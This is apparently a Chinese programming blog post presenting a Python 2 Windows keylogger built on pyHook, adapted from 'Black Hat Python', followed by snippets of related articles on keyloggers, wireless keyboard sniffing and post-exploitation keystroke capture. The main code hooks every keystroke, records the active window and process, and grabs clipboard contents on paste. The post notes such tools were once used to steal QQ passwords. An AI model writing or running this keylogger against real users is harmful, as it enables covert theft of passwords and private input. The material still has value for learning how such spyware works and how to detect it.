Windows键盘嗅探器

最新推荐文章于 2021-05-05 05:20:52 发布
最新推荐文章于 2021-05-05 05:20:52 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: python 文章标签: windows python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u013473520/article/details/51427909
版权

Windows键盘嗅探器

今天,闲的无聊,于是做了一个简单的键盘嗅探器,主要代码来源于《Python黑帽子》,不得不说,这本书写的特别好,带我进入了黑客的编程世界。以前学习编程,只知道常用的功能,不知道怎么入门网络安全方面,当然吗,现在还没有。。。

键盘记录是一个古老的技术,可以捕捉你在键盘上打的字符,从而知道你的隐私信息,以前QQ密码常用的盗窃就是这样实现的,当然了,一山更比一山高,现在最新版的QQ不能获取了,我试探的时候,QQ客户端会随机产生字母出来,完全无法捕捉。

不管了,我们先来看看如何获取键盘的信息,我们需要安装PyHook库,这个库封装了Windows函数SetWindowsHookEx,简称钩子函数,这个函数允许我们安装自定义的钩子函数,当特定的WIndows事件发生,这个钩子函数就会被调用,从而获得按键消息。

我们看代码:

#coding:utf-8
from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None

def get_current_process():
    #获得前台句柄
    hwnd = user32.GetForegroundWindow()
    #获得进程ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd,byref(pid))
    process_id = '%d' % pid.value

    executable = create_string_buffer('\x00'*512)
    h_process = kernel32.OpenProcess(0x400|0x10,False,pid)
    psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
    #读取窗口标题
    window_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title),512)

    print 
    print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)
    print 
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)


####################################
##########钩子核心代码###############
def KeyStroke(event):
    global current_window
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()
        # if they pressed a standard key
    if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii),
    else:
        ####如果输入的[Ctrl+V],则获得剪贴板内容
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print "[PASTE] - %s" % (pasted_value),
        else:
            print "[%s]" % event.Key,
    return True
###############钩子管理#######
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
kl.HookKeyboard()
pythoncom.PumpMessages()

最后运行,就可以获得敲键盘的所以信息了,不要用它干坏事哦!!!

键盘捕捉工具
11-22
键盘捕捉工具,记录键盘输入的内容,很实用的工具
KeySweeper:Windows 键盘无线按键记录器
07-01
是一种隐蔽的基于 Arduino 的设备,伪装成一个功能正常的 USB 壁式充电器,它无线和被动地嗅探、解密、记录和报告(通过 GSM)来自附近任何 Microsoft 无线键盘的所有击键。 所有击键都在线和本地记录。 SMS 警报...
读书笔记_键盘嗅探器(1)
wodamazi
11-15 486
利用驱动分层技术,可以将多个驱动程序连接在一起,通过这种方式,开发人员能够修改现有驱动程序的行为,无需重新编写整个驱动程序。几乎所有的硬件设备都存在着驱动程序链。最底层驱动程序处理对总线和硬件设备的直接访问,更高层的驱动程序处理数据格式化,错误代码以及高层请求转化为更细小更有针对性的硬件操作细节。 分层机制是rootkit的一个重要概念,因为在数据出入更底层硬件的移动过程中涉及分层的驱动程序,分...
读书笔记_键盘嗅探器(2)
wodamazi
11-18 167
为处理READ请求而调用的例程是DispatchRead。下面具体分析该函数: NTSTAUS DispatchRead ( IN PDEVICE_OBJECT pDeviceObject, IN PIRPpIrp) { 当一个READ请求到达键盘控制器时,就调用该函数。这时IRP中并没有可用的数据。相反我们希望在捕获了击键动作之后查看IRP——当IRP正在沿着设备链向上传输时。 关于I...
KeySweeper 微软无线键盘嗅探装置
weixin_34293902的博客
05-29 196
Author:Samy KamkarFrom:http://samy.pl/keysweeper/中文字幕由Galaxy无名提供 PS:视频传到youku之后发现50秒左右的字幕被干掉了,不知道后面还有没有这样的地方。如果这种地方很多的话,可以从下面的网址下载熟肉:1.http://kcal.pw/output.mp42.http://pa...
大量无线键盘存在KeySniffer漏洞-可嗅探用户输入的内容
weixin_34232617的博客
07-27 216
几美元的一根天线、一个无线发射器,还有几行Python代码,有了这些,黑客就可以在几十米开外主动地记录下你的用户名、密码、信用卡、你写的稿子,总之就是你用无线键盘输入的任何东西。 黑客所利用的是一种无线键盘漏洞,这种漏洞无法轻易防范,而且很难想到。来自Bastille安全公司的研究人员率先发现了这一漏洞,并把它命名为KeySniffer。 影响设备 ...
利用SMM技术实现PS/2键盘嗅探
"这篇文档详细介绍了键盘记录技术,特别是通过系统管理模式(SMM)来实现PS/2键盘嗅探的方法。作者Chul-woong Lee探讨了SMM的概念、系统管理中断(#SMI)的工作原理,以及这种方法与现有键盘嗅探技术的比较。文档还...
网络嗅探器的设计与实现.docx
03-11
嗅探器不同于键盘记录器,它直接捕获网络上的数据报文,而非用户的输入行为。 设计目标主要包括创建一个简易的嗅探器界面,实现数据包的抓取、暂停抓取和清空列表的功能。开发过程中,主要采用Microsoft Visual ...
MFC与WinpCap打造多功能网络嗅探器教程
在深入探讨这个“原创MFC+WinpCap网络嗅探器(sniffer)”之前,让我们先对标题、描述、标签和文件名称列表进行分析,并从中提取出相关知识点。 ### 标题分析 标题中的“原创MFC+WinpCap网络嗅探器”指出了软件的两...
WinPCAP网络嗅探器设计与实现:安全挑战与防范
此外,摘要中还提到,网络嗅探器作为一种技术工具,其本质是利用计算机网络接口截取数据报文,区别于仅捕获键盘输入的程序。因此,正确理解和控制网络嗅探器的使用至关重要,以防止其落入不法之手,损害网络安全。 ...
键盘鼠标捕捉软件
04-16
极其简化的exe界面,可以实时捕捉鼠标与键盘的动作,并且重复动作,完成人工重复的电脑操作,可用于电脑办公的所有重复操作场景
winio键盘捕获工具
11-25
使用winio底层驱动拦截键盘操作,感兴趣的可以玩玩。
键盘精灵,一款可以捕获按键显示到屏幕的软件
11-05
一款可以捕获按键显示到屏幕的软件,可以用来录制教学视频的按键操作。相当于ev录屏的付费功能.按键显示清晰.可以拖动到任意位置.
键盘监听器
11-25
该程序由python生成,运行该程序,会监听键盘的操作,并记录到txt文件。txt文件存在程序的运行目录下。
按键勾子捕捉所有鼠标、键盘消息
11-22
按键勾子捕捉所有鼠标、键盘消息,亲测可用带demo,注释详细
windows和linux上的包嗅探
xy2bl的博客
02-03 592
一个简单的嗅探器,以管理员方式运行脚本,以下为运行结果
Linux网络嗅探工具,微软“雪藏”的七个Windows 10强力工具
weixin_42662293的博客
05-05 398
在过去的一年中,微软悄悄发布了多个Windows 10命令行工具和免费的应用商店程序,极大增强了操作系统功能。也许是这些工具过于“专业”,微软并没有大事宣传这些新工具,很多甚至是由“强力”用户自己发现的。本文,我们将重点介绍Windows 10的七款“隐藏”工具,解锁这些工具可以让高级用户如虎添翼,更好地控制Windows 10。Pktmon网络数据包嗅探器在2018年10月10日的Windows...
操作系统之键盘捕捉
小段孩
04-11 1172
linux下挂载键盘 试想一下,当按下键盘上某个字符时,操作系统是怎样获取到这个字符的呢?然后又怎样回显到终端的呢? 按下键盘触发键盘中断 void main(void) { ... tty_init(); ... } void tty_init(void) { rs_init(); con_init(); } void con_init(void) { ... // 设置键盘中断处...
嗅探对方机器,获取机器键盘记录
weixin_33895475的博客
11-01 317
这也是一个很简单的方式,简略做一个笔记,首先在已经渗透进去的情况下,渗透的方式多种多样,我这里直接过, 我这里直接使用ms17_010过一遍,重点说一下嗅探键盘记录。 这是已经进去了哈,下面开始吧 转移一下进程,首先ps看一下,得找那些是当前用户的进程,我从dwm.exe入手 这个步骤得小心一下,据D7哥(公告二维码)说的情况是, 有些时候 explorer.exe迁移 会使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值